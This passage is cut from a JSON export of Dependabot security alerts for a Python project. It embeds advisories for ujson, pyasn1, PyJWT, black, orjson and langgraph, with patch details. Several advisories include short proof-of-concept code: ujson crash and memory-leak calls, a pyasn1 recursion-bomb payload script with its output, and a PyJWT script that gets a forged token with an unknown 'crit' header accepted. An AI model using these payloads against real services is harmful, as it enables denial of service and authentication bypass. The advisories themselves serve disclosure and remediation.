obj)\n```","severity":"medium","identifiers":[{"value":"GHSA-rf74-v2fm-23pw","type":"GHSA"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-rf74-v2fm-23pw"},{"url":"https://github.com/advisories/GHSA-rf74-v2fm-23pw"}],"published_at":"2026-03-18T20:17:43Z","updated_at":"2026-03-18T20:17:44Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":5.1}},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/32","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/32","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":31,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-c8rr-9gxc-jprv","cve_id":"CVE-2026-32875","summary":"UltraJSON has an integer overflow handling large indent leads to buffer overflow or infinite loop","description":"### Summary\n\n`ujson.dumps()` crashes the Python interpreter (segmentation fault) when the product of the `indent` parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the `indent` is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service.\n\n(Note: A negative indent to `ujson` means add spaces after colons but do not add line breaks or indentation. It is unclear to the current maintainers whether this was ever even an intended feature or just a byproduct of the way it was written.)\n\n### Exploitability\n\nTo be vulnerable, a service must call `ujson.dump()`/`ujson.dumps()`/`ujson.encode()` whilst giving untrusted users control over the `indent` parameter and not restrict that indentation to reasonably small non-negative values. (Even with the fix for this vulnerability, such usage is strongly advised against since even a bug-free JSON serialiser would be vulnerable to denial of service simply by the attacker requesting indents that have the server needlessly filling out gigabytes of whitespace.)\n\nA service may also be vulnerable to the infinite loop if it uses a fixed _negative_ `indent`. An underflow always occurs for any negative indent when the input data is at least one level nested but, for small negative indents, the underflow is usually accidentally rectified by another overflow. As far as the maintainers are aware, the infinite loop can not be reached for indentations from -1 to -65536 / max_recursion_depth_as_limited_by_stack_size but users of negative indents are encouraged to consider their service affected even if the infinite loop seems unreachable.\n\n### Example\n\n```python\nimport ujson\n\ndef example(depth, indent):\n a = [0]\n for i in range(1000):\n a = [a]\n ujson.dumps(a, indent=indent)\n\nexample(1, 2**30) # segfault\nexample(1000, -200) # infinite loop\n```\n\n### Patches\n\nujson 5.12.0, containing 486bd4553dc471a1de11613bc7347a6b318e37ea, promotes the integer types where the overflow occurred, skips the indentation code path for negative indent (which was supposed to be a no-op) and places an artificial cap of 1000 on the `indent` parameter.\n\n### Workarounds\n\nUsers who don't wish to upgrade can either use a fixed indentation, no indentation or ensure indentation is non-negative and not enormous (below `2**31 / max_recursion_depth_as_limited_by_stack_size`).\n\n### References\n\nThe original bug report can be found at https://github.com/ultrajson/ultrajson/issues/700\n\nThis issue was independently discovered by @coco1629, @EthanKim88 and @vmfunc.","severity":"high","identifiers":[{"value":"GHSA-c8rr-9gxc-jprv","type":"GHSA"},{"value":"CVE-2026-32875","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c8rr-9gxc-jprv"},{"url":"https://github.com/ultrajson/ultrajson/issues/700"},{"url":"https://github.com/ultrajson/ultrajson/commit/486bd4553dc471a1de11613bc7347a6b318e37ea"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32875"},{"url":"https://github.com/advisories/GHSA-c8rr-9gxc-jprv"}],"published_at":"2026-03-18T13:01:24Z","updated_at":"2026-03-20T21:19:57Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00069,"percentile":0.21015},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-190","name":"Integer Overflow or Wraparound"},{"cwe_id":"CWE-787","name":"Out-of-bounds Write"},{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.1.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/31","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/31","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":30,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wgvc-ghv9-3pmm","cve_id":"CVE-2026-32874","summary":"UltraJSON has a Memory Leak parsing large integers allows DoS ","description":"#### Summary\n\nujson 5.4.0 to 5.11.0 inclusive contain an accumulating memory leak in JSON parsing _large_ (outside of the range [-2^63, 2^64 - 1]) integers.\n\n#### Exploitability\n\nAny service that calls `ujson.load()`/`ujson.loads()`/`ujson.decode()` on untrusted inputs is affected and vulnerable to denial of service attacks.\n\n#### Details\n\nThe leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than `sys.get_int_max_str_digits()` digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload.\n\n```python\nujson.loads(str(2 ** 64 - 1)) # No leak\nujson.loads(str(2 ** 64)) # Leaks\nujson.loads(str(10 ** sys.get_int_max_str_digits())) # Leaks and raises ValueError\n```\n\n#### Fix\n\nThe leak is fixed in `ujson 5.12.0` (4baeb950df780092bd3c89fc702a868e99a3a1d2). There are no workarounds beyond upgrading to an unaffected version.\n\n#### Credits\n\nDiscovered by Cameron Criswell/Skevros using Coverage-guided fuzzing (libFuzzer + AddressSanitizer)","severity":"high","identifiers":[{"value":"GHSA-wgvc-ghv9-3pmm","type":"GHSA"},{"value":"CVE-2026-32874","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-wgvc-ghv9-3pmm"},{"url":"https://github.com/ultrajson/ultrajson/commit/4baeb950df780092bd3c89fc702a868e99a3a1d2"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32874"},{"url":"https://github.com/advisories/GHSA-wgvc-ghv9-3pmm"}],"published_at":"2026-03-18T13:01:15Z","updated_at":"2026-03-20T21:19:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00073,"percentile":0.22173},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/30","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/30","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":29,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-jr27-m4p2-rc6r","cve_id":"CVE-2026-30922","summary":"Denial of Service in pyasn1 via Unbounded Recursion","description":"### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b'\\x30\\x80' \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.","severity":"high","identifiers":[{"value":"GHSA-jr27-m4p2-rc6r","type":"GHSA"},{"value":"CVE-2026-30922","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"},{"url":"https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30922"},{"url":"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"},{"url":"http://www.openwall.com/lists/oss-security/2026/03/20/4"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html"},{"url":"https://github.com/advisories/GHSA-jr27-m4p2-rc6r"}],"published_at":"2026-03-17T16:17:33Z","updated_at":"2026-05-01T18:31:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00026,"percentile":0.07182},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/29","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/29","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":28,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"PyJWT"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-752w-5fwx-jx9f","cve_id":"CVE-2026-32597","summary":"PyJWT accepts unknown `crit` header extensions","description":"## Summary\n\nPyJWT does not validate the `crit` (Critical) Header Parameter defined in\nRFC 7515 §4.1.11. When a JWS token contains a `crit` array listing\nextensions that PyJWT does not understand, the library accepts the token\ninstead of rejecting it. This violates the **MUST** requirement in the RFC.\n\nThis is the same class of vulnerability as CVE-2025-59420 (Authlib),\nwhich received CVSS 7.5 (HIGH).\n\n---\n\n## RFC Requirement\n\nRFC 7515 §4.1.11:\n\n> The \"crit\" (Critical) Header Parameter indicates that extensions to this\n> specification and/or [JWA] are being used that **MUST** be understood and\n> processed. [...] If any of the listed extension Header Parameters are\n> **not understood and supported** by the recipient, then the **JWS is invalid**.\n\n---\n\n## Proof of Concept\n\n```python\nimport jwt # PyJWT 2.8.0\nimport hmac, hashlib, base64, json\n\n# Construct token with unknown critical extension\nheader = {\"alg\": \"HS256\", \"crit\": [\"x-custom-policy\"], \"x-custom-policy\": \"require-mfa\"}\npayload = {\"sub\": \"attacker\", \"role\": \"admin\"}\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\nh = b64url(json.dumps(header, separators=(\",\", \":\")).encode())\np = b64url(json.dumps(payload, separators=(\",\", \":\")).encode())\nsig = b64url(hmac.new(b\"secret\", f\"{h}.{p}\".encode(), hashlib.sha256).digest())\ntoken = f\"{h}.{p}.{sig}\"\n\n# Should REJECT — x-custom-policy is not understood by PyJWT\ntry:\n result = jwt.decode(token, \"secret\", algorithms=[\"HS256\"])\n print(f\"ACCEPTED: {result}\")\n # Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}\nexcept Exception as e:\n print(f\"REJECTED: {e}\")\n```\n\n**Expected:** `jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy`\n**Actual:** Token accepted, payload returned.\n\n### Comparison with RFC-compliant library\n\n```python\n# jwcrypto — correctly rejects\nfrom jwcrypto import jwt as jw_jwt, jwk\nkey = jwk.JWK(kty=\"oct\", k=b64url(b\"secret\"))\njw_jwt.JWT(jwt=token, key=key, algs=[\"HS256\"])\n# raises: InvalidJWSObject('Unknown critical header: \"x-custom-policy\"')\n```\n\n---\n\n## Impact\n\n- **Split-brain verification** in mixed-library deployments (e.g., API\n gateway using jwcrypto rejects, backend using PyJWT accepts)\n- **Security policy bypass** when `crit` carries enforcement semantics\n (MFA, token binding, scope restrictions)\n- **Token binding bypass** — RFC 7800 `cnf` (Proof-of-Possession) can be\n silently ignored\n- See CVE-2025-59420 for full impact analysis\n\n---\n\n## Suggested Fix\n\nIn `jwt/api_jwt.py`, add validation in `_validate_headers()` or\n`decode()`:\n\n```python\n_SUPPORTED_CRIT = {\"b64\"} # Add extensions PyJWT actually supports\n\ndef _validate_crit(self, headers: dict) -> None:\n crit = headers.get(\"crit\")\n if crit is None:\n return\n if not isinstance(crit, list) or len(crit) == 0:\n raise InvalidTokenError(\"crit must be a non-empty array\")\n for ext in crit:\n if ext not in self._SUPPORTED_CRIT:\n raise InvalidTokenError(f\"Unsupported critical extension: {ext}\")\n if ext not in headers:\n raise InvalidTokenError(f\"Critical extension {ext} not in header\")\n```\n\n---\n\n## CWE\n\n- CWE-345: Insufficient Verification of Data Authenticity\n- CWE-863: Incorrect Authorization\n\n## References\n\n- [RFC 7515 §4.1.11](https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11)\n- [CVE-2025-59420 — Authlib crit bypass (CVSS 7.5)](https://osv.dev/vulnerability/GHSA-9ggr-2464-2j32)\n- [RFC 7800 — Proof-of-Possession Key Semantics](https://www.rfc-editor.org/rfc/rfc7800)","severity":"high","identifiers":[{"value":"GHSA-752w-5fwx-jx9f","type":"GHSA"},{"value":"CVE-2026-32597","type":"CVE"}],"references":[{"url":"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32597"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"},{"url":"https://github.com/advisories/GHSA-752w-5fwx-jx9f"}],"published_at":"2026-03-13T20:05:04Z","updated_at":"2026-05-05T18:34:23Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00013,"percentile":0.02358},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"},{"cwe_id":"CWE-863","name":"Incorrect Authorization"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/28","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/28","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":27,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"orjson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-hx9q-6w63-j58v","cve_id":"CVE-2025-67221","summary":"orjson does not limit recursion for deeply nested JSON documents","description":"The orjson.dumps function in orjson before 3.11.6 does not limit recursion for deeply nested JSON documents.","severity":"high","identifiers":[{"value":"GHSA-hx9q-6w63-j58v","type":"GHSA"},{"value":"CVE-2025-67221","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-67221"},{"url":"https://github.com/ijl/orjson"},{"url":"https://github.com/kpatsakis/orjson_vulnerability"},{"url":"https://github.com/ijl/orjson/issues/620"},{"url":"https://github.com/kpatsakis/CVE-2025-67221/issues/1"},{"url":"https://github.com/ijl/orjson/commit/62bb185b70785ded49c79c26f8c9781f1e6fe370"},{"url":"https://github.com/advisories/GHSA-hx9q-6w63-j58v"}],"published_at":"2026-01-22T18:30:33Z","updated_at":"2026-03-12T20:49:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P","score":7.7}},"epss":{"percentage":0.00025,"percentile":0.06553},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/27","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/27","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":26,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"black"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3936-cmfr-pm3m","cve_id":"CVE-2026-32274","summary":"Black: Arbitrary file writes from unsanitized user input in cache file name","description":"### Impact\n\nBlack writes a cache file, the name of which is computed from various formatting options. The value of the `--python-cell-magics` option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. \n\n### Patches\n\nFixed in Black 26.3.1.\n\n### Workarounds\n\nDo not allow untrusted user input into the value of the `--python-cell-magics` option.","severity":"high","identifiers":[{"value":"GHSA-3936-cmfr-pm3m","type":"GHSA"},{"value":"CVE-2026-32274","type":"CVE"}],"references":[{"url":"https://github.com/psf/black/security/advisories/GHSA-3936-cmfr-pm3m"},{"url":"https://github.com/psf/black/pull/5038"},{"url":"https://github.com/psf/black/commit/4937fe6cf241139ddbfc16b0bdbb5b422798909d"},{"url":"https://github.com/psf/black/releases/tag/26.3.1"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32274"},{"url":"https://github.com/advisories/GHSA-3936-cmfr-pm3m"}],"published_at":"2026-03-12T18:33:10Z","updated_at":"2026-03-13T13:36:21Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","score":8.7}},"epss":{"percentage":0.00021,"percentile":0.05654},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/26","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/26","created_at":"2026-04-30T08:37:34Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":25,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langgraph"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g48c-2wqr-h844","cve_id":"CVE-2026-28277","summary":"LangGraph checkpoint loading has unsafe msgpack deserialization","description":"LangGraph checkpointers can load msgpack-encoded checkpoints that reconstruct Python objects during deserialization. If an attacker can modify checkpoint data in the backing store (for example, after a database compromise or other privileged write access to the persistence layer), they can potentially supply a crafted payload that triggers unsafe object reconstruction when the checkpoint is loaded.\n\nThis is a **post-exploitation / defense-in-depth** issue. Exploitation requires the ability to write attacker-controlled checkpoint bytes at rest. In most deployments that prerequisite already implies a serious incident; the additional risk is turning “checkpoint-store write access” into code execution in the application runtime, which can expand blast radius (for example by exposing environment variables or cloud credentials available to the runtime).\n\nThere is no evidence of exploitation in the wild, and LangGraph is not aware of a practical exploitation path in existing deployments today. This change is intended to reduce the blast radius of a checkpoint-store compromise.\n\n## Affected users / systems\n\nUsers may be affected if they:\n\n- use a persistent checkpointer (database, remote store, shared filesystem, etc.),\n- load/resume from checkpoints, and\n- operate in an environment where an attacker could gain privileged write access to checkpoint data in the backing store.\n\nThis issue requires the attacker to be able to modify persisted checkpoint bytes (or to compromise a trusted component that writes them). It is generally not reachable by an unauthenticated remote attacker in a correctly configured deployment.\n\n## Impact\n- Potential **arbitrary code execution** or other unsafe side effects during checkpoint deserialization.\n- Escalation from “write access to checkpoint store” to “code execution in the application runtime,” which may expose runtime secrets or provide access to other systems the runtime can reach.\n\n## Exploitation scenario (high level)\n1. Attacker gains privileged write access to the checkpoint store (for example, via database compromise, leaked credentials, or abuse of an administrative data path).\n2. Attacker writes a crafted checkpoint payload containing msgpack data intended to reconstruct dangerous objects.\n3. Application resumes and deserializes the checkpoint; unsafe reconstruction could execute attacker-controlled behavior.\n\n## Mitigation / remediation\nLangGraph provides an allowlist-based hardening mechanism for msgpack checkpoint deserialization.\n\n### Strict mode (environment variable)\n- **`LANGGRAPH_STRICT_MSGPACK`**\n - When set truthy (`1`, `true`, `yes`), the default msgpack deserialization policy becomes strict.\n - Concretely: `JsonPlusSerializer()` will default `allowed_msgpack_modules` to `None` (strict) instead of `True` (warn-and-allow), unless `allowed_msgpack_modules=...` is explicitly passed.\n\n### `allowed_msgpack_modules` (serializer/checkpointer config)\nThis setting controls what msgpack “ext” types are allowed to be reconstructed.\n\n- `True` (default when strict mode is not enabled): allow all ext types, but log a warning when deserializing a type that is not explicitly registered.\n- `None` (strict): only a built-in safe set is reconstructed; other ext types are blocked.\n- `[(module, class_name), ...]` (strict allowlist): the built-in safe set plus exactly the listed symbols are reconstructed (exact-match).\n\n### Built-in safe set\nA small set of types is always treated as safe to reconstruct (for example `datetime` types, `uuid.UUID`, `decimal.Decimal`, `set`/`frozenset`/`deque`, `ipaddress` types, `pathlib` paths, `zoneinfo.ZoneInfo`, compiled regex patterns, and selected LangGraph internal types).\n\n### Automatically derived allowlist (only when compiling graphs)\nWhen `LANGGRAPH_STRICT_MSGPACK` is enabled and `StateGraph` is compiled, LangGraph derives an allowlist from the graph’s schemas and channels and applies it to the checkpointer.\n\n- The allowlist is built by walking the state/input/output/context schemas (plus node/branch input schemas) and channel value/update types. It includes Pydantic v1/v2 models, dataclasses, enums, TypedDict field types, and common typing constructs (containers, unions, `Annotated`).\n- LangGraph also includes a curated set of common LangChain message classes.\n\nThis derived allowlist is only applied if the selected checkpointer supports `with_allowlist(...)`. If a user is constructing serializers/checkpointers manually (or using a checkpointer that does not support allowlist propagation), they will need to configure `allowed_msgpack_modules` themselves.\n\n### Operational guidance\n- Treat checkpoint stores as integrity-sensitive. Restrict write access and rotate credentials if compromise is suspected.\n- Enable strict mode (`LANGGRAPH_STRICT_MSGPACK=true`) in production if feasible, and rely on schema-driven allowlisting to reduce incompatibilities.\n- Avoid providing custom msgpack deserialization hooks that reconstruct arbitrary types unless checkpoint data is fully trusted.\n\n## Limitations / important notes\n- If a checkpointer implementation does **not** support allowlist application (i.e., does not implement `with_allowlist`), allowlist enforcement may be skipped (with a warning). In that situation, strict expectations may not hold.\n- If an application supplies a custom msgpack unpack hook (`ext_hook`), the custom hook controls reconstruction and can bypass the default allowlist checks (intentional escape hatch, but it weakens the protection).\n\n## LangSmith / hosted deployments note\nLangSmith is not aware of this issue presenting risk to existing LangSmith-hosted deployments. The described threat model requires an attacker to tamper with the checkpoint persistence layer used by the deployment; typical hosted configurations are designed to prevent such access.\n\nFirst reported by: yardenporat353","severity":"medium","identifiers":[{"value":"GHSA-g48c-2wqr-h844","type":"GHSA"},{"value":"CVE-2026-28277","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-g48c-2wqr-h844"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28277"},{"url":"https://github.com/advisories/GHSA-g48c-2wqr-h844"}],"published_at":"2026-03-05T20:19:49Z","updated_at":"2026-03-09T13:19:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 